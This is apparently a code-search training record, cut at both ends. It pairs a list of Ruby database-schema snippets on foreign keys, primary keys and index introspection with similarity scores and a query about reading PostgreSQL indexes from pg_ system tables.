rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def parent_table_for(possible_foreign_key)\n pluralize singular_association_name(possible_foreign_key) if possible_foreign_key =~ foreign_key_regex\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def foreign_key?\n true\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def foreign_key_column_name\n @foreign_key_column_name ||= begin\n out = options[:foreign_key]\n\n unless out\n out = \"#{@model_class.name.underscore}_#{association_name}\"\n out = $1 if out =~ %r{/([^/]+)$}i\n out = out + \"_id\"\n end\n\n out = out.to_s if out.kind_of?(Symbol)\n\n out\n end\n end",
"def add_foreign_keys(create_table_cmd, current_table)\r\n foreign_keys = []\r\n puts \"you currently have #{get_tables.length} other table(s)\"\r\n while true\r\n made_reference = true\r\n puts \"these are your current other tables:\"\r\n print_table_names\r\n puts \"what table would you like to refer to?\"\r\n reference_table = get_valid_name\r\n if foreign_keys.include? reference_table\r\n puts \"#{reference_table} is already referenced by this table.\"\r\n made_reference = false\r\n elsif !get_tables.include? reference_table\r\n puts \"that table is not in the list. would you like to create it as a table?\"\r\n if get_response == 'yes'\r\n create_table(reference_table)\r\n 5.times {puts ''}\r\n else\r\n made_reference = false\r\n end\r\n end\r\n if made_reference\r\n puts \"A reference to table '#{reference_table}' has been added.\"\r\n foreign_keys << reference_table\r\n end\r\n puts \"would you like to connect #{current_table} to a different table?\"\r\n break if get_response == 'no'\r\n end\r\n foreign_keys.each {|table_name| create_table_cmd += \", #{table_name}_id INT\"}\r\n foreign_keys.each {|table_name| create_table_cmd += \", FOREIGN KEY (#{table_name}_id) REFERENCES #{table_name}(id)\"}\r\n create_table_cmd\r\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def sort_dumped_tables(tables, options=OPTS)\n if options[:foreign_keys] != false && supports_foreign_key_parsing?\n table_fks = {}\n tables.each{|t| table_fks[t] = foreign_key_list(t)}\n # Remove self referential foreign keys, not important when sorting.\n table_fks.each{|t, fks| fks.delete_if{|fk| fk[:table] == t}}\n tables, skipped_foreign_keys = sort_dumped_tables_topologically(table_fks, [])\n options[:skipped_foreign_keys] = skipped_foreign_keys\n tables\n else\n tables\n end\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def db_fields_for_table(table_name)\n db_fields = {}\n result = @db.schema(table_name).each do |col|\n db_fields[col[0].to_sym] = col[1]\n end\n\n db_fields\n end",
"def match_foreign_key(column)\n if column.ref_table == @name || foreign_keys.include?(column.name.downcase)\n @name if primary_key\n end\n end",
"def dump( out )\n out << \"foreign_key #{out_columns}, #{out_table_name}#{out_opts}\"\n end",
"def dump_table_generator(table, options=OPTS)\n s = schema(table, options).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map(&:first)\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:recreate_column)\n im = method(:index_to_generator_opts)\n\n if options[:indexes] != false && supports_index_parsing?\n indexes = indexes(table).sort\n end\n\n if options[:foreign_keys] != false && supports_foreign_key_parsing?\n fk_list = foreign_key_list(table)\n \n if (sfk = options[:skipped_foreign_keys]) && (sfkt = sfk[table])\n fk_list.delete_if{|fk| sfkt.has_key?(fk[:columns])}\n end\n\n composite_fks, single_fks = fk_list.partition{|h| h[:columns].length > 1}\n fk_hash = {}\n\n single_fks.each do |fk|\n column = fk.delete(:columns).first\n fk.delete(:name)\n fk_hash[column] = fk\n end\n\n s = s.map do |name, info|\n if fk_info = fk_hash[name]\n [name, fk_info.merge(info)]\n else\n [name, info]\n end\n end\n end\n\n create_table_generator do\n s.each{|name, info| m.call(name, info, self, options)}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts, options))} if indexes\n composite_fks.each{|fk| send(:foreign_key, fk[:columns], fk)} if composite_fks\n end\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def remove_table_not_exist_foreign_keys\n @foreign_keys.each do |table, foreign_keys|\n foreign_keys.delete_if do |key|\n if key.is_a?(String) && key =~ /_id$/\n class_name = Prepares.model_associations.get_association_class_name(table, key[0..-4])\n class_name ? !@table_nodes[class_name.gsub('::', '').tableize] : !@table_nodes[key[0..-4].pluralize]\n end\n end\n end\n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def foreign_key_name(class_name)\n Inflector.foreign_key(class_name).to_sym\n end",
"def foreign_key?\n false\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def belongs_to(table, options = {})\n options = options.merge(:references => table)\n options[:on_delete] = options.delete(:dependent) if options.has_key?(:dependent)\n column(\"#{table.to_s.singularize}_id\".to_sym, :integer, options)\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def get_origin_foreign_key\n if @origin_class\n return [@origin_class.revisionary_options[:polymorphic]].map { |p| [ \"#{p}_type\", \"#{p}_id\" ] }.flatten\n foreign_key = self.class.reflect_on_all_associations.find { |a| a.klass == @origin_class }.options[:foreign_key].to_s\n @foreign_key ||= foreign_key.blank? ? [@origin_class.name.downcase + '_id'] : [foreign_key]\n end\n end",
"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def foreign_key\n association.foreign_key \n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def fk_suffix\n @opts[:foreign_key][:suffix]\n end"
] |
[
"0.72586703",
"0.70443857",
"0.7040204",
"0.65597934",
"0.64049715",
"0.6336679",
"0.6077278",
"0.60334164",
"0.60242915",
"0.60242915",
"0.60122025",
"0.5995262",
"0.5981016",
"0.5927055",
"0.5910303",
"0.5858759",
"0.58397806",
"0.5837277",
"0.5833357",
"0.5808299",
"0.579208",
"0.57647914",
"0.57351565",
"0.57138044",
"0.5633697",
"0.5633663",
"0.56320786",
"0.56309414",
"0.5617408",
"0.5592668",
"0.55903906",
"0.55903906",
"0.55762225",
"0.555621",
"0.5551065",
"0.55232054",
"0.5522503",
"0.55138856",
"0.54714763",
"0.54714763",
"0.54692006",
"0.54471195",
"0.54388994",
"0.5434409",
"0.5428107",
"0.5418014",
"0.5417996",
"0.5378057",
"0.5377245",
"0.5377181",
"0.5367812",
"0.5331822",
"0.5326429",
"0.52891374",
"0.5285981",
"0.5257063",
"0.5255529",
"0.52437764",
"0.5234658",
"0.5229042",
"0.5229042",
"0.5206363",
"0.5169734",
"0.51606077",
"0.5159984",
"0.5158775",
"0.5158775",
"0.5152576",
"0.5152576",
"0.5148342",
"0.51432604",
"0.5118049",
"0.5117193",
"0.5117193",
"0.51138026",
"0.50894576",
"0.5088455",
"0.5072457",
"0.50705934",
"0.5068498",
"0.50643027",
"0.5060041",
"0.50255084",
"0.50083715",
"0.49993968",
"0.499779",
"0.49880967",
"0.49783796",
"0.49591783",
"0.49214277",
"0.4919943",
"0.49009892",
"0.48949605",
"0.48936677",
"0.48867992",
"0.48850214",
"0.48826542",
"0.48821062",
"0.48640287",
"0.4845968"
] |
0.7318138
|
0
|
Use the pg_ system tables to determine indexes on a table
|
def indexes(table, opts=OPTS)
m = output_identifier_meth
cond = {Sequel[:tab][:oid]=>regclass_oid(table, opts)}
cond[:indpred] = nil unless opts[:include_partial]
indexes = {}
_indexes_ds.where_each(cond) do |r|
i = indexes[m.call(r[:name])] ||= {:columns=>[], :unique=>r[:unique], :deferrable=>r[:deferrable]}
i[:columns] << m.call(r[:column])
end
indexes
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n \n # Changed from upstread: link to pg_am to grab the index type (e.g. \"gist\")\n result = query(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n INNER JOIN pg_attribute a ON a.attrelid = t.oid\n INNER JOIN pg_am am ON i.relam = am.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname IN (#{schemas}) )\n ORDER BY i.relname\n SQL\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n indtype = row[4]\n\n # Changed from upstream: need to get the column types to test for spatial indexes\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = [r[0], r[2]]; attlist}\n SELECT a.attname, a.attnum, t.typname\n FROM pg_attribute a\n INNER JOIN pg_type t ON a.atttypid = t.oid\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # Only GiST indexes on spatial columns denote a spatial index\n spatial = indtype == 'gist' && columns.size == 1 && (columns.values.first[1] == 'geometry' || columns.values.first[1] == 'geography')\n\n column_names = indkey.map {|attnum| columns[attnum] ? columns[attnum][0] : nil }.compact\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n end",
"def indexes(table_name, name = nil)\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = query(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname, t.typname\n FROM pg_attribute a, pg_type t\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n AND a.atttypid = t.oid\n SQL\n columns = columns.inject({}){ |h, r| h[r[0].to_s] = [r[1], r[2]]; h }\n column_names = columns.values_at(*indkey).compact.map{ |a| a[0] }\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n # using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n spatial = inddef =~ /using\\s+gist/i &&\n columns.size == 1 &&\n %w[geometry geography].include?(columns.values.first[1])\n\n # IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n ::RGeo::ActiveRecord::SpatialIndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, !!spatial)\n end\n end.compact\n end",
"def indexes(table_name, name = nil) #:nodoc:\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\nSELECT i.relname, d.indisunique, a.attname\nFROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_namespace n\nWHERE i.relkind = 'i'\nAND d.indexrelid = i.oid\nAND d.indisprimary = 'f'\nAND t.oid = d.indrelid\nAND t.relname = '#{table_name}'\nAND a.attrelid = t.oid\nAND n.nspname in (#{schemas})\nAND n.oid = t.relnamespace\nAND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\nOR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\nOR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\nOR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\nOR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\nORDER BY i.relname\nSQL\n \n current_index = nil\n indexes = []\n \n result.each do |row|\n if current_index != row[0]\n indexes << IndexDefinition.new(table_name, row[0], row[1] == \"t\", [])\n current_index = row[0]\n end\n \n indexes.last.columns << row[2]\n end\n \n indexes\n end",
"def indexes(table_name)\n scope = quoted_scope(table_name)\n\n result = query(<<-SQL, \"SCHEMA\")\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = #{scope[:name]}\n AND n.nspname = #{scope[:schema]}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1]\n indkey = row[2].split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n definition = inddef.sub(INDEX_WHERE_EXPRESSION, '')\n\n if column_expression = definition.match(INDEX_COLUMN_EXPRESSION)[1]\n columns = split_expression(expressions).map do |functional_name|\n remove_type(functional_name)\n end\n\n columns = columns.size > 1 ? columns : columns[0]\n end\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\"?\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(\" \")\n else\n orders[column] = :desc if desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\n SELECT i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_am am\n WHERE i.relkind = 'i'\n AND d.indexrelid = i.oid\n AND d.indisprimary = 'f'\n AND t.oid = d.indrelid\n AND i.relam = am.oid\n AND t.relname = '#{table_name}'\n AND a.attrelid = t.oid\n AND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\n OR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\n OR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\n OR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\n OR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\n ORDER BY i.relname\n SQL\n\n indexes = []\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n spatial = row[4] == \"gist\"\n\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = r[0]; attlist}\n SELECT a.attname, a.attnum\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n column_names = indkey.map {|attnum| columns[attnum] }\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n\n indexes\n end",
"def get_indexes\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n i.relname,\n ri.indisprimary,\n pg_get_indexdef(i.oid)\n FROM\n pg_class r,\n pg_class i,\n pg_index ri\n WHERE\n ri.indexrelid = i.oid\n AND ri.indrelid = r.oid\n AND r.relkind = 'r'\n AND i.relkind = 'i'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = Hash.new(){|hash, key| hash.store(key, [])}\n results.each do |row|\n table, index, primary_key, create_sql = row.split(/\\t/)\n hash[table] << {:index => index, :primary_key => primary_key == 't', :create_sql => create_sql}\n end\n hash\n end",
"def indexes(table_name, name = nil)\n # NOTE: maybe it's better to leave things of to the JDBC API ?!\n result = select_rows(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map! do |row|\n index_name = row[0]\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n # NOTE: this hack should no longer be needed ...\n # indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n # indkey = indkey.split(\" \")\n indkey = row[2].split(' ')\n inddef = row[3]\n oid = row[4]\n\n columns = select_rows(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n columns = Hash[ columns.each { |column| column[0] = column[0].to_s } ]\n column_names = columns.values_at(*indkey).compact\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[ desc_order_columns.map { |column| [column, :desc] } ] : {}\n\n if ::ActiveRecord::VERSION::MAJOR > 3 # AR4 supports `where` and `using` index options\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n else\n new_index_definition(table_name, index_name, unique, column_names, [], orders)\n end\n end\n end\n result.compact!\n result\n end",
"def indexes(table_name)\n\n # FIXME: AR version => table = Utils.extract_schema_qualified_name(table_name.to_s)\n schema, table = extract_schema_and_table(table_name.to_s)\n\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table}'\n AND n.nspname = #{schema ? \"'#{schema}'\" : 'ANY (current_schemas(false))'}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n # FIXME: These values [1,2] are returned in a different format than AR expects, maybe we could update it on the Java side to be more accurate\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n indkey = indkey.split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n columns = expressions\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(' ')\n elsif desc\n orders[column] = :desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def table_indexes(table)\n ActiveRecord::Base.connection.indexes(table)\n end",
"def table_indexes(table)\n ActiveRecord::Base.connection.indexes(table)\n end",
"def indexes\n select_all( <<-SQL\n SELECT\n t.relname AS table,\n ix.relname AS name,\n regexp_replace(pg_get_indexdef(indexrelid), '^[^\\\\(]*\\\\((.*)\\\\)$', '\\\\1') AS columns,\n regexp_replace(pg_get_indexdef(indexrelid), '.* USING ([^ ]*) \\\\(.*', '\\\\1') AS using,\n indisunique AS unique,\n indisprimary AS primary,\n indisvalid AS valid,\n indexprs::text,\n indpred::text,\n pg_get_indexdef(indexrelid) AS definition\n FROM\n pg_index i\n INNER JOIN\n pg_class t ON t.oid = i.indrelid\n INNER JOIN\n pg_class ix ON ix.oid = i.indexrelid\n ORDER BY\n 1, 2\n SQL\n ).map { |v| v[\"columns\"] = v[\"columns\"].sub(\") WHERE (\", \" WHERE \").split(\", \"); v }\n end",
"def indexes(table_name, name = nil)#:nodoc:\n indexes = []\n current_index = nil\n (execute(\"SHOW KEYS FROM #{table_name}\", name) || []).each do |row|\n if current_index != row[2]\n next if row[2] == \"PRIMARY\" # skip the primary key\n current_index = row[2]\n indexes << ActiveRecord::ConnectionAdapters::IndexDefinition.new(row[0], row[2], row[1] == \"0\", [], row[10] == \"SPATIAL\")\n end\n indexes.last.columns << row[4]\n end\n indexes\n end",
"def indexes(table_name, name = nil)\n (owner, table_name) = @connection.describe(table_name)\n unless all_schema_indexes\n result = select_all(<<-SQL)\n SELECT lower(i.table_name) as table_name, lower(i.index_name) as index_name, i.uniqueness, lower(c.column_name) as column_name\n FROM all_indexes i, all_ind_columns c\n WHERE i.owner = '#{owner}'\n AND i.table_owner = '#{owner}'\n AND c.index_name = i.index_name\n AND c.index_owner = i.owner\n AND NOT EXISTS (SELECT uc.index_name FROM all_constraints uc WHERE uc.index_name = i.index_name AND uc.owner = i.owner AND uc.constraint_type = 'P')\n ORDER BY i.index_name, c.column_position\n SQL\n \n current_index = nil\n self.all_schema_indexes = []\n \n result.each do |row|\n # have to keep track of indexes because above query returns dups\n # there is probably a better query we could figure out\n if current_index != row['index_name']\n self.all_schema_indexes << ::ActiveRecord::ConnectionAdapters::IndexDefinition.new(row['table_name'], row['index_name'], row['uniqueness'] == \"UNIQUE\", [])\n current_index = row['index_name']\n end\n \n self.all_schema_indexes.last.columns << row['column_name']\n end\n end\n \n # Return the indexes just for the 